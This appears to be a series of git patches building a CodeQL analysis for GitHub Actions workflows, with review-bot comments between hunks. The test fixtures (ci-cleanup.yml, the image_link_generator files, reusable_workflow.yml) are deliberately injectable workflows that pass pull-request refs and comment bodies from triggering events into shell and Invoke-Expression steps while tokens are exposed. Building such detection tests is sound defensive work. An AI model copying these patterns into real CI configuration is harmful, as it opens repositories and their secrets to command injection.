@@ -135,3 +123,15 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } + +private class ChangedFilesSource extends RemoteFlowSource { + ChangedFilesSource() { + exists(UsesExpr uses | + uses.getTarget() = "tj-actions/changed-files" and + uses.getVersion() = ["v10", "v20", "v30", "v40"] and + uses = this.asExpr() + ) + } + + override string getSourceType() { result = "User-controlled list of changed files" } +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 8b57ea2436eb..9f0286238489 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -97,8 +97,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof StepStmt - then result = this.(StepStmt).getName() - else result = this.(JobStmt).getName() + then result = this.(StepStmt).getId() + else result = this.(JobStmt).getId() } } @@ -295,4 +295,3 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } - From da2ac2af03bb73814a7727796312464cbf35f4d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:52:14 +0100 Subject: [PATCH 009/707] Process only .github/workflows yaml files --- ql/lib/codeql/actions/ast/internal/Actions.qll | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index e3be61fd3b99..a11759b0c932 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll 
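Review bot: `uses.getVersion() = ["v10", "v20", "v30", "v40"]` recognises only four exact tags, so a workflow pinned to `v39`, `v40.1.1`, `v35.5.0` or a commit SHA is not treated as a source of user-controlled file names, and the silent `v1`→`v10` edit made while moving the class shows how easily the hand-written list drifts. If the intent is "every release up to v40", presumably because later releases escape the output, match on the major version instead, `uses.getVersion().regexpMatch("v([1-9]|[1-3][0-9]|40)(\\..*)?")`, and record the reason in a comment such as `// Releases up to v40 emit raw file names; later releases escape them (verify before extending)`. SHA-pinned references carry no tag at all and need a separate decision (treat as unknown, or resolve the SHA); at minimum the class doc should say they are currently skipped. The same class is deleted in the earlier hunk of this file, so the note covers both.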
@@ -19,9 +19,7 @@ module Actions { f = this.getLocation().getFile() and ( f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or - f.getBaseName() = ["action.yml", "action.yaml"] or - // ALVARO: Add any yaml files temporary for development - f.getExtension() = ["yml", "yaml"] + f.getBaseName() = ["action.yml", "action.yaml"] ) ) } From 1708e0f19d76f2feebc7cab3ecd81a0bc2b65878 Mon Sep 17 00:00:00 2001 
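Review bot: The remaining workflow pattern `"(^|.*/)\\.github/workflows/.*\\.ya?ml$"` still accepts files in subdirectories of `.github/workflows/`, which GitHub does not load as workflows, so templates or fixtures kept under something like `.github/workflows/archive/` would be analysed as live workflows. Tightening the final segment, `f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/[^/]+\\.ya?ml$")`, keeps the test-directory prefix that the `(^|.*/)` part allows while excluding nested files. The enclosing class and characteristic predicate start outside the hunk.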
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:55:21 +0100 Subject: [PATCH 010/707] Move tests files to .github/workflows --- ql/lib/test/{ => .github/workflows}/test.yml | 0 .../{ => .github/workflows}/changed-files.yml | 0 ql/src/test/.github/workflows/ci-cleanup.yml | 47 ++++++++++++++ .../workflows/image_link_generator.yml | 55 +++++++++++++++++ .../workflows/image_link_generator_2.yml | 61 +++++++++++++++++++ .../workflows/image_link_generator_3.yml | 27 ++++++++ .../test/{ => .github/workflows}/inter1.yml | 0 .../test/{ => .github/workflows}/no-flow1.yml | 0 .../test/{ => .github/workflows}/no-flow2.yml | 0 .../test/{ => .github/workflows}/simple1.yml | 0 .../test/{ => .github/workflows}/simple2.yml | 0 ql/src/test/{ => .github/workflows}/test.yml | 0 12 files changed, 190 insertions(+) rename ql/lib/test/{ => .github/workflows}/test.yml (100%) rename ql/src/test/{ => .github/workflows}/changed-files.yml (100%) create mode 100644 ql/src/test/.github/workflows/ci-cleanup.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator_2.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator_3.yml rename ql/src/test/{ => .github/workflows}/inter1.yml (100%) rename ql/src/test/{ => .github/workflows}/no-flow1.yml (100%) rename ql/src/test/{ => .github/workflows}/no-flow2.yml (100%) rename ql/src/test/{ => .github/workflows}/simple1.yml (100%) rename ql/src/test/{ => .github/workflows}/simple2.yml (100%) rename ql/src/test/{ => .github/workflows}/test.yml (100%) diff --git a/ql/lib/test/test.yml b/ql/lib/test/.github/workflows/test.yml similarity index 100% rename from ql/lib/test/test.yml rename to ql/lib/test/.github/workflows/test.yml 
diff --git a/ql/src/test/changed-files.yml b/ql/src/test/.github/workflows/changed-files.yml similarity index 100% rename from ql/src/test/changed-files.yml rename to ql/src/test/.github/workflows/changed-files.yml diff --git a/ql/src/test/.github/workflows/ci-cleanup.yml b/ql/src/test/.github/workflows/ci-cleanup.yml new file mode 100644 index 000000000000..11a101cef491 --- /dev/null +++ b/ql/src/test/.github/workflows/ci-cleanup.yml 
@@ -0,0 +1,47 @@
+run-name: Cleanup ${{ github.head_ref }}
+on:
+ pull_request_target:
+ types: labeled
+ paths:
+ - "images/**"
+
+jobs:
+ clean_ci:
+ name: Clean CI runs
+ runs-on: ubuntu-latest
+ permissions:
+ actions: write
+ steps:
+ - env:
+ GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ shell: pwsh
+ run: |
+ $startDate = Get-Date -UFormat %s
+ $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022")
+ while ($true) {
+ $continue = $false
+ foreach ($wf in $workflows) {
+ $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId"
+ $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId }
+ $skippedIds | ForEach-Object {
+ $deleteCommand = "gh run delete --repo ${{ github.repository }} $_"
+ Invoke-Expression -Command $deleteCommand
+ }
+ $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'"
+ $pending = Invoke-Expression -Command $pendingCommand
+ if ($pending -gt 0) {
+ Write-Host "Pending for ${wf}.yml: $pending run(s)"
+ $continue = $true
+ }
+ }
+ if ($continue -eq $false) {
+ Write-Host "All done, exiting"
+ break
+ }
+ $curDate = Get-Date -UFormat %s
+ if (($curDate - $startDate) -gt 60) {
+ Write-Host "Reached timeout, exiting"
+ break
+ }
+ Write-Host "Waiting 5 seconds..."
+ Start-Sleep -Seconds 5
diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml
new file mode 100644
index 000000000000..6239f0490d13
--- /dev/null
+++ b/ql/src/test/.github/workflows/image_link_generator.yml
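Review bot: This fixture embeds `${{ github.event.pull_request.head.ref }}` in a `pull_request_target` `run:` script that is then handed to `Invoke-Expression`, i.e. the expression-injection shape the library is meant to find, but nothing in the commit says which step is the expected alert: the diffstat lists only YAML files, with no `.expected` or `.qlref` beside them, and the tests moved out of `ql/src/test/` bring no results file with them. A one-line marker on the sink, e.g. `# expected: expression injection via github.event.pull_request.head.ref`, or the `id: source` / `id: sink` convention used in image_link_generator_3.yml would make the fixture self-describing. The `permissions: actions: write` together with `secrets.GITHUB_TOKEN` in the same step's `env:` is also worth recording in that comment, since it is what makes this pattern high impact.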
@@ -0,0 +1,55 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: extract-url + run: | + INITIAL_URL=$(echo "${{ github.event.comment.body }}" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: curl + run: | + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "${{ steps.extract-url.outputs.initial_url }}") + echo "Curl Command Executed" + echo "Redirected URL: $REDIRECTED_URL" + echo "::set-output name=redirected_url::$REDIRECTED_URL" + + - name: Trim URL after PNG + id: trim-url + run: | + TRIMMED_URL=$(echo "${{ steps.curl.outputs.redirected_url }}" | sed 's/\(.*\.png\).*/\1/') + echo "Trimmed URL: $TRIMMED_URL" + echo "::set-output name=trimmed_url::$TRIMMED_URL" + + - name: Output Final Trimmed URL + run: | + echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" + + - name: Update Comment with New URL + run: | + COMMENT_URL="${{ github.event.comment.url }}" + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" + ORIGINAL_COMMENT_BODY="${{ github.event.comment.body }}" + UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" + + PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') + curl -X PATCH \ + -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ + -H "Accept: application/vnd.github.v3+json" \ + "${COMMENT_URL}" \ + -d "$PAYLOAD" + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} 
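Review bot: image_link_generator.yml and image_link_generator_2.yml interpolate `${{ github.event.comment.body }}` (directly in `run:` in the first, through `env:` in the second) but, unlike image_link_generator_3.yml, they do not label the intended source and sink steps, so a reader cannot tell whether the expected finding is the `echo "${{ github.event.comment.body }}"` line, the `curl ... "${{ steps.extract-url.outputs.initial_url }}"` step, or the PATCH request that writes the comment back. I'd add `id: source` / `id: sink` or a short comment on each step that is expected to alert, consistent with the third fixture. Both files also set outputs only with the deprecated `::set-output` workflow command; a variant that writes `>> $GITHUB_OUTPUT` would exercise the form current runners use.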
diff --git a/ql/src/test/.github/workflows/image_link_generator_2.yml b/ql/src/test/.github/workflows/image_link_generator_2.yml new file mode 100644 index 000000000000..01d332492519 --- /dev/null +++ b/ql/src/test/.github/workflows/image_link_generator_2.yml 
@@ -0,0 +1,61 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: extract-url + env: + BODY: ${{ github.event.comment.body }} + run: | + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: curl + env: + INITIAL_URL: ${{ steps.extract-url.outputs.initial_url }} + run: | + REDIRECTED_URL=$(curl -L -o /dev/null -w %{url_effective} -sS "$INITIAL_URL") + echo "Curl Command Executed" + echo "Redirected URL: $REDIRECTED_URL" + echo "::set-output name=redirected_url::$REDIRECTED_URL" + + - name: Trim URL after PNG + id: trim-url + env: + REDIRECTED_URL: ${{ steps.curl.outputs.redirected_url }} + run: | + TRIMMED_URL=$(echo "$REDIRECTED_URL" | sed 's/\(.*\.png\).*/\1/') + echo "Trimmed URL: $TRIMMED_URL" + echo "::set-output name=trimmed_url::$TRIMMED_URL" + + - name: Output Final Trimmed URL + run: | + echo "Final Trimmed Image URL: ${{ steps.trim-url.outputs.trimmed_url }}" + + - name: Update Comment with New URL + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + COMMENT_URL: ${{ github.event.comment.url }} + ORIGINAL_COMMENT_BODY: ${{ github.event.comment.body }} + run: | + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" + UPDATED_COMMENT="${ORIGINAL_COMMENT_BODY} 👀 ${NEW_COMMENT_BODY}" + + PAYLOAD=$(jq -n --arg body "$UPDATED_COMMENT" '{"body": $body}') + curl -X PATCH \ + -H "Authorization: token ${{ secrets.GITHUB_TOKEN }}" \ + -H "Accept: application/vnd.github.v3+json" \ + "${COMMENT_URL}" \ + -d "$PAYLOAD" 
diff --git a/ql/src/test/.github/workflows/image_link_generator_3.yml b/ql/src/test/.github/workflows/image_link_generator_3.yml new file mode 100644 index 000000000000..70aece4f7cff --- /dev/null +++ b/ql/src/test/.github/workflows/image_link_generator_3.yml @@ -0,0 +1,27 @@ +name: Image URL Processing + +on: + issue_comment: + types: [created] + +jobs: + process-image-url: + runs-on: ubuntu-latest + if: contains(github.event.comment.body, 'https://github.com/github/release-assets/assets/') + steps: + - name: Checkout + uses: actions/checkout@v2 + + - name: Extract and Clean Initial URL + id: source + env: + BODY: ${{ github.event.comment.body }} + run: | + INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + echo "Cleaned Initial URL: $INITIAL_URL" + echo "::set-output name=initial_url::$INITIAL_URL" + + - name: Get Redirected URL with Debugging + id: sink + run: | + echo ${{ steps.source.outputs.initial_url }} diff --git a/ql/src/test/inter1.yml b/ql/src/test/.github/workflows/inter1.yml similarity index 100% rename from ql/src/test/inter1.yml rename to ql/src/test/.github/workflows/inter1.yml diff --git a/ql/src/test/no-flow1.yml b/ql/src/test/.github/workflows/no-flow1.yml similarity index 100% rename from ql/src/test/no-flow1.yml rename to ql/src/test/.github/workflows/no-flow1.yml diff --git a/ql/src/test/no-flow2.yml b/ql/src/test/.github/workflows/no-flow2.yml similarity index 100% rename from ql/src/test/no-flow2.yml rename to ql/src/test/.github/workflows/no-flow2.yml diff --git a/ql/src/test/simple1.yml b/ql/src/test/.github/workflows/simple1.yml similarity index 100% rename from ql/src/test/simple1.yml rename to ql/src/test/.github/workflows/simple1.yml diff --git a/ql/src/test/simple2.yml b/ql/src/test/.github/workflows/simple2.yml similarity index 100% rename from ql/src/test/simple2.yml rename to ql/src/test/.github/workflows/simple2.yml 
diff --git a/ql/src/test/test.yml b/ql/src/test/.github/workflows/test.yml similarity index 100% rename from ql/src/test/test.yml rename to ql/src/test/.github/workflows/test.yml From 83ca36bc76ff38f99be4c14a2f07a69b0ab021b5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:56:22 +0100 Subject: [PATCH 011/707] Support RunExpr's env vars --- ql/lib/codeql/actions/Ast.qll | 8 +++++ .../actions/controlflow/internal/Cfg.qll | 14 ++++++-- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 32 +++++++++++++++++++ .../dataflow/internal/DataFlowPrivate.qll | 15 +++++++-- 4 files changed, 65 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d2c7fdd45010..d9306b53815d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -169,6 +169,13 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } + Expression getEnvExpr(string name) { + exists(Actions::StepEnv env | + env.getStep() = this and + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + ) + } + string getScript() { result = scriptExpr.getValue() } } @@ -183,6 +190,7 @@ class ExprAccessExpr extends Expression instanceof YamlString { string getExpression() { result = expr } JobStmt getJob() { result.getAChildNode*() = this } + //override string toString() { result = expr } } /** diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index c549eb401980..a2ebb10219ef 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
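Review bot: `getEnvExpr(string name)` consults only the step-level `env:` (`env.getStep() = this`), so a tainted value bound to the same variable at job or workflow level reaches the script through the identical `$NAME` reference but is invisible to this accessor and to the taint step built on it in FlowSteps.qll. State the scope in QLDoc, e.g. `/** Gets the expression bound to the step-level env variable name. Job- and workflow-level env mappings are not considered. */`, or extend the lookup to the enclosing job's and workflow's `env` mappings. The commented-out `//override string toString() { result = expr }` in ExprAccessExpr should be removed rather than committed.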
@@ -171,8 +171,18 @@ private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { } private class RunTree extends StandardPreOrderTree instanceof RunExpr { - override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } + //override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } } private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } - diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 528f9e54832c..223ff305ba43 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -20,6 +20,9 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +/** + * Holds if actions-find-and-replace-string step is used. + */ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | 
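Review bot: The previous `getChildNode` override is kept as a commented-out line directly above its replacement; delete it rather than leave dead code, the history is in git. Because `env:` may appear before or after `run:` in a step, the rank-by-location ordering visits the env expressions and the script in source order rather than env first; if that is intentional, say so above the override, e.g. `// Children are ordered by source position; env entries are not guaranteed to precede the script.`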
@@ -29,3 +32,32 @@ private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { ) } } + +/** + * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. + * e.g. + * - name: Extract and Clean Initial URL + * id: extract-url + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * INITIAL_URL=$(echo "$BODY" | grep -o 'https://github.com/github/release-assets/assets/[^ >]*') + * echo "Cleaned Initial URL: $INITIAL_URL" + * echo "::set-output name=initial_url::$INITIAL_URL" + */ +private class RunEnvToScriptStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node pred, DataFlow::Node succ) { test(pred, succ) } +} + +predicate test(DataFlow::Node pred, DataFlow::Node succ) { + exists(RunExpr r, string varName | + r.getEnvExpr(varName) = pred.asExpr() and + exists(string script, string line | + script = r.getScript() and + line = script.splitAt("\n") and + line.regexpMatch(".*::set-output\\s+name.*") and + script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 + ) and + succ.asExpr() = r + ) +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 9f0286238489..534eb4fe657b 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -197,7 +197,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } -predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { +predicate usesOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output exists(UsesExpr uses, StepOutputAccessExpr outputRead | uses = nodeFrom.asExpr() and 
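Review bot: The helper predicate `test` is public and generically named, so it becomes part of the library's API; make it `private predicate runEnvToScriptStep(DataFlow::Node pred, DataFlow::Node succ)` or inline it into `RunEnvToScriptStep.step`. Two checks inside it are narrower than intended: `script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0` excludes an occurrence at offset 0, so `exists(script.indexOf("$" + ["", "{", "ENV{"] + varName))` is what was meant, and `line.regexpMatch(".*::set-output\\s+name.*")` recognises only the deprecated workflow command, so scripts that write `>> $GITHUB_OUTPUT` never get this taint step; `line.regexpMatch(".*(::set-output\\s+name|GITHUB_OUTPUT).*")` covers both. The substring check also matches `$BODY` inside `$BODY_EXTRA`, so this is a coarse heuristic, and the QLDoc should say that any use of the variable anywhere in a script that sets any output is treated as a flow into the whole RunExpr.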
@@ -207,6 +207,16 @@ predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { ) } +predicate runOutputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output + exists(RunExpr uses, StepOutputAccessExpr outputRead | + uses = nodeFrom.asExpr() and + outputRead = nodeTo.asExpr() and + outputRead.getStepId() = uses.getId() and + uses.getJob() = outputRead.getJob() + ) +} + predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression exists(Expression astFrom, JobOutputAccessExpr astTo | @@ -223,7 +233,8 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepOutputDefToUse(nodeFrom, nodeTo) or + usesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or jobOutputDefToUse(nodeFrom, nodeTo) } From 5006ffe20338f5355fdb578527b06acfa04f3285 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 12:01:41 +0100 Subject: [PATCH 012/707] Use the LibYaml default AST hierarchy --- ql/lib/codeql/actions/Ast.qll | 37 +---------------------------------- 1 file changed, 1 insertion(+), 36 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d9306b53815d..96a8a2a7f147 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
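Review bot: `runOutputDefToUse` is a copy of `usesOutputDefToUse` with the type swapped, but the local is still named `uses` and the comment still describes the output of a Uses step; rename it to `run` and say what it is, e.g. `// nodeTo is a StepOutputAccessExpr that reads an output set by the script of the nodeFrom Run step`. The two predicates differ only in the step type, so a single predicate over the common step class (if StepStmt can be equated with `nodeFrom.asExpr()`) would keep them from drifting apart; the rename in the previous hunk already touched one and not the other.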
@@ -2,48 +2,13 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations /** - * Base class for the AST tree. - * Based on YamlNode from the Yaml library but making mapping values children of the mapping keys: - * eg: top: - * key: value - * According to the Yaml library, both `key` and `value` are direct children of `top` - * This Tree implementation makes `key` child od `top` and `value` child of `key` + * Base class for the AST tree. Based on YamlNode from the Yaml library. */ class AstNode instanceof YamlNode { AstNode getParentNode() { result = super.getParentNode() } - // AstNode getParentNode() { - // if exists(YamlMapping m | m.maps(_, this)) - // then exists(YamlMapping m | m.maps(result, this)) - // else result = super.getParentNode() - // } AstNode getAChildNode() { result = super.getAChildNode() } - // AstNode getAChildNode() { - // if this instanceof YamlMapping - // then this.(YamlMapping).maps(result, _) - // else - // if this instanceof YamlCollection - // then result = super.getChildNode(_) - // else - // if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) - // then exists(YamlMapping m | m.maps(this, result)) - // else none() - // } - // /** - // * This should be getAChildNode(int i) - // */ - // AstNode getChildNodeByOrder(int i) { - // result = - // rank[i](Expression child, Location l | - // child = this.getAChildNode() and - // child.getLocation() = l - // | - // child - // order by - // l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - // ) - // } string toString() { result = super.toString() } string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } From db413361f78c836c190b112dafbbc1a1991dff52 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 15:11:39 +0100 Subject: [PATCH 013/707] Add Reusable Workflow test --- .../.github/workflows/calling_workflow.yml | 18 ++++++++++++++++++ .../.github/workflows/reusable_workflow.yml | 18 ++++++++++++++++++ 2 files changed, 36 insertions(+) create mode 100644 ql/lib/test/.github/workflows/calling_workflow.yml create mode 100644 ql/lib/test/.github/workflows/reusable_workflow.yml diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/lib/test/.github/workflows/calling_workflow.yml new file mode 100644 index 000000000000..3b0ab8f18d32 --- /dev/null +++ b/ql/lib/test/.github/workflows/calling_workflow.yml @@ -0,0 +1,18 @@ +on: push + +jobs: + call-workflow-1-in-local-repo: + uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit + call-workflow-2-in-local-repo: + uses: ./.github/workflows/reusable_workflow.yml + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit + call-workflow-in-another-repo: + uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 + with: + config-path: ${{ github.event.pull_request.head.ref }} + secrets: inherit diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/lib/test/.github/workflows/reusable_workflow.yml new file mode 100644 index 000000000000..f31c8a63d740 --- /dev/null +++ b/ql/lib/test/.github/workflows/reusable_workflow.yml @@ -0,0 +1,18 @@ +name: Reusable workflow example + +on: + workflow_call: + inputs: + config-path: + required: true + type: string + secrets: + token: + required: true + +jobs: + triage: + runs-on: ubuntu-latest + steps: + - id: sink + run: echo ${{ inputs.config-path }} From 9659098ab6745ff95c14ae0683423b1c18971408 Mon Sep 17 00:00:00 2001 
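Review bot: calling_workflow.yml triggers on `push` but passes `${{ github.event.pull_request.head.ref }}`, a field absent from the push payload that evaluates to an empty string at run time, so as a fixture it effectively asserts that the analysis is not event-aware; if that is deliberate a comment saying so would help, otherwise `on: pull_request_target` matches the pattern being modelled. In reusable_workflow.yml the `id: sink` step unquotes `${{ inputs.config-path }}` in `run:`, which is the intended injection sink, but the declared `secrets: token` is never used in the workflow, so it could be dropped or annotated as testing `secrets: inherit` handling.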
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 15:40:06 +0100 Subject: [PATCH 014/707] Support for Reusable workflows --- ql/lib/codeql/actions/Ast.qll | 114 +++++++++++++++++- .../actions/controlflow/internal/Cfg.qll | 48 +++++++- .../dataflow/internal/DataFlowPrivate.qll | 76 +++++++----- ql/lib/test/.github/workflows/test.yml | 10 +- ql/lib/test/test.ql | 19 ++- 5 files changed, 217 insertions(+), 50 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 96a8a2a7f147..8f8347e766f4 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -34,8 +34,51 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { JobStmt getAJob() { result = super.getJob(_) } JobStmt getJob(string id) { result = super.getJob(id) } + + predicate isReusable() { this instanceof ReusableWorkflowStmt } } +class ReusableWorkflowStmt extends WorkflowStmt { + YamlMapping parameters; + + ReusableWorkflowStmt() { + exists(Actions::On on | + on.getWorkflow() = this and + on.getNode("workflow_call").(YamlMapping).lookup("inputs") = parameters + ) + } + + ParamsStmt getParams() { result = parameters } + + // TODO: implemnt callable name + string getName() { result = this.getLocation().getFile().getRelativePath() } +} + +class ParamsStmt extends Statement instanceof YamlMapping { + ParamsStmt() { + exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) + } + + /** + * Gets a specific parameter expression (YamlMapping) by name. + * eg: + * on: + * workflow_call: + * inputs: + * config-path: + * required: true + * type: string + * secrets: + * token: + * required: true + */ + ParamExpr getParamExpr(string name) { + this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + } +} + +class ParamExpr extends Expression instanceof YamlValue { } + /** * A Job is a collection of steps that run in an execution environment. */ 
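Review bot: `ReusableWorkflowStmt` exists only when `workflow_call` has an `inputs` mapping, so a reusable workflow that declares no inputs (or only `secrets`) is never a ReusableWorkflowStmt, gets no CfgScope and cannot be a DataFlowCallable; if that is intended the QLDoc should say so, otherwise bind `parameters` optionally. `ParamExpr` has no characteristic predicate, so every YamlValue that is an Expression is a ParamExpr; tying it to its container, `ParamExpr() { exists(ParamsStmt p | p.(YamlMapping).maps(_, this)) }`, spares the later `ParamExprTree` and `TParameterNode` uses from re-filtering. The `// TODO: implemnt callable name` note (typo aside) should say what the current relative-path name is used for, since `viableCallable` later compares against it.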
